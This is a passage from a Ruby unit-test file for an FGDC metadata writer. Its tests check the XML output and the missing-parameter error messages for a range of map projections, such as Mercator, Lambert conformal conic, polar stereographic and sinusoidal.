assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
end
# map projections - gnomonic perspective
def test_mapProjection_gnomonic
expect = @@axExpect[6].to_s.squeeze(' ')
hProjection = TDClass.build_projection('gnomonic', 'Gnomonic')
TDClass.add_longPC(hProjection)
TDClass.add_latPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfProjectionCenter)
hProjection.delete(:latitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection gnomonic'
end
# map projections - lambert azimuthal equal area
def test_mapProjection_lambertEqualArea
expect = @@axExpect[7].to_s.squeeze(' ')
hProjection = TDClass.build_projection('lambertEqualArea', 'Lambert Azimuthal Equal Area')
TDClass.add_longPC(hProjection)
TDClass.add_latPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfProjectionCenter)
hProjection.delete(:latitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection lambertEqualArea'
end
# map projections - lambert conformal conic
def test_mapProjection_lambertConic
expect = @@axExpect[8].to_s.squeeze(' ')
hProjection = TDClass.build_projection('lambertConic', 'Lambert Conformal Conic')
TDClass.add_standardParallel(hProjection, 2)
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:standardParallel2] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:standardParallel2)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection lambertConic'
end
# map projections - mercator (standard parallel)
def test_mapProjection_mercatorSP
expect = @@axExpect[9].to_s.squeeze(' ')
hProjection = TDClass.build_projection('mercator', 'Mercator')
TDClass.add_standardParallel(hProjection, 1)
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
end
# def test_mapProjection_elements_mercator_SF
def test_mapProjection_mercatorSF
expect = @@axExpect[10].to_s.squeeze(' ')
hProjection = TDClass.build_projection('mercator', 'Mercator')
TDClass.add_scaleFactorE(hProjection)
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:scaleFactorAtEquator] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:scaleFactorAtEquator)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection mercator'
end
# map projections - miller cylindrical
def test_mapProjection_miller
expect = @@axExpect[11].to_s.squeeze(' ')
hProjection = TDClass.build_projection('miller', 'Miller Cylindrical')
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection miller'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection miller'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection miller'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection miller'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection miller'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection miller'
end
# map projections - oblique mercator (line azimuth)
def test_mapProjection_obliqueMercatorLA
expect = @@axExpect[12].to_s.squeeze(' ')
hProjection = TDClass.build_projection('obliqueMercator', 'Oblique Mercator')
TDClass.add_scaleFactorCL(hProjection)
TDClass.add_obliqueLineAzimuth(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:scaleFactorAtCenterLine] = nil
hProjection[:azimuthAngle] = nil
hProjection[:azimuthMeasurePointLongitude] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at center line is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line azimuth information is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:scaleFactorAtCenterLine)
hProjection.delete(:azimuthAngle)
hProjection.delete(:azimuthMeasurePointLongitude)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at center line is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line azimuth information is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
# test empty azimuth angle
hProjection[:azimuthAngle] = nil
hProjection[:azimuthMeasurePointLongitude] = 99.9
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line azimuth angle is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
# test empty point longitude
hProjection[:azimuthAngle] = 99.9
hProjection[:azimuthMeasurePointLongitude] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line measure point longitude is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
end
# map projections - oblique mercator (line point)
def test_mapProjection_obliqueMercatorLP
expect = @@axExpect[13].to_s.squeeze(' ')
hProjection = TDClass.build_projection('obliqueMercator', 'Oblique Mercator')
TDClass.add_scaleFactorCL(hProjection)
TDClass.add_obliqueLinePoint(hProjection)
TDClass.add_obliqueLinePoint(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements (messages same as oblique line point)
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:scaleFactorAtCenterLine] = nil
hProjection[:obliqueLinePoint] = []
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line azimuth information is missing: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
# test one point
TDClass.add_obliqueLinePoint(hProjection)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection oblique line point must have two points: CONTEXT is spatial reference horizontal planar map projection obliqueMercator'
end
# map projections - orthographic
def test_mapProjection_orthographic
expect = @@axExpect[14].to_s.squeeze(' ')
hProjection = TDClass.build_projection('orthographic', 'Orthographic')
TDClass.add_latPC(hProjection)
TDClass.add_longPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:latitudeOfProjectionCenter)
hProjection.delete(:longitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection orthographic'
end
# map projections - polar stereographic (standard parallel)
def test_mapProjection_polarStereoSP
expect = @@axExpect[15].to_s.squeeze(' ')
hProjection = TDClass.build_projection('polarStereo', 'Polar Stereographic')
TDClass.add_straightFromPole(hProjection)
TDClass.add_standardParallel(hProjection, 1)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:straightVerticalLongitudeFromPole] = nil
hProjection[:standardParallel1] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection straight vertical longitude from pole is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:straightVerticalLongitudeFromPole)
hProjection.delete(:standardParallel1)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection straight vertical longitude from pole is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
end
# map projections - polar stereographic (scale factor)
def test_mapProjection_polarStereoSF
expect = @@axExpect[16].to_s.squeeze(' ')
hProjection = TDClass.build_projection('polarStereo', 'Polar Stereographic')
TDClass.add_straightFromPole(hProjection)
TDClass.add_scaleFactorPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements (same messages as polarStereo standard parallel)
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:straightVerticalLongitudeFromPole] = nil
hProjection[:scaleFactorAtProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polarStereo'
end
# map projections - polyconic
def test_mapProjection_polyconic
expect = @@axExpect[17].to_s.squeeze(' ')
hProjection = TDClass.build_projection('polyconic', 'Polyconic')
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements (same messages as polarStereo standard parallel)
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection polyconic'
end
# map projections - robinson
def test_mapProjection_robinson
expect = @@axExpect[18].to_s.squeeze(' ')
hProjection = TDClass.build_projection('robinson', 'Robinson')
TDClass.add_longPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection robinson'
end
# map projections - sinusoidal
def test_mapProjection_sinusoidal
expect = @@axExpect[19].to_s.squeeze(' ')
hProjection = TDClass.build_projection('sinusoidal', 'Sinusoidal')
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
